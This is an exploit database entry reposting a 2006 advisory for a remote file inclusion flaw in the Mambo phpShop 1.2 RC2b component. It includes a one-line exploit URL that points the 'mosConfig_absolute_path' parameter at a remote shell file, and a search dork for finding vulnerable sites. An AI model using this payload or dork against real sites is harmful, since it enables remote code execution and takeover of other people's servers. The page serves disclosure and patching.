header-logo
Suggest Exploit
vendor:
Mambo phpShop
by:
Charles Nelwan a.k.a Cmaster4
6,4
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: Mambo phpShop
Affected Version From: 1.2 RC2b
Affected Version To: 1.2 RC2b
Patch Exists: Yes
Related CWE: N/A
CPE: a:mambo-phpshop:mambo_phpshop:1.2_rc2b
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Mambo phpShop v1.2 RC2b Remote File Inclusion Vulnerability

A Remote File Inclusion vulnerability was discovered in Mambo phpShop v1.2 RC2b, a fully featured shop component with IPN support, categories, userhandling, etc. An attacker can exploit this vulnerability to include arbitrary files from remote locations by manipulating the 'mosConfig_absolute_path' parameter in the 'toolbar.phpshop.html.php' script. This can be exploited to execute arbitrary PHP code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of Mambo phpShop.
Source

Exploit-DB raw data:

Affected Application: Mambo phpShop v1.2 RC2b

(Mambo CMS Component)


. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


Discoverd/Found by: Charles Nelwan a.k.a Cmaster4

Team: BatamHacker irc.dal.net crew

URL: http://www.batamhacker.info/forum

E-Mail: bugtraq_indo@yahoo.com



. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .


Typ: Remote [x] Local [ ]

Remote File Inclusion [x] SQL Injection [ ]

Level: Low [ ] Middle [x] High [ ]

Application: Mambo phpShop

Version: 1.2 RC2b

Vulnerable File: toolbar.phpshop.html.ph

URL: http://www.mambo-phpshop.net or http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=category&filecatid=1054

Description: phpShop component for Mambo. A fully featured shop component with IPN support, categories, userhandling, etc.

inurl:"com_phpshop"


. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


http://www.targer.com/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt



Shoutz:
~~~~~~
~ Special Greetz To My BATAMHACKER CREW ON IRC.DAL.NET h4ntu, havicaz, baylaw
~ To All Indonesian Underground Hacker 

# milw0rm.com [2006-08-17]

Navigation

Suggest Exploit

Services By CQR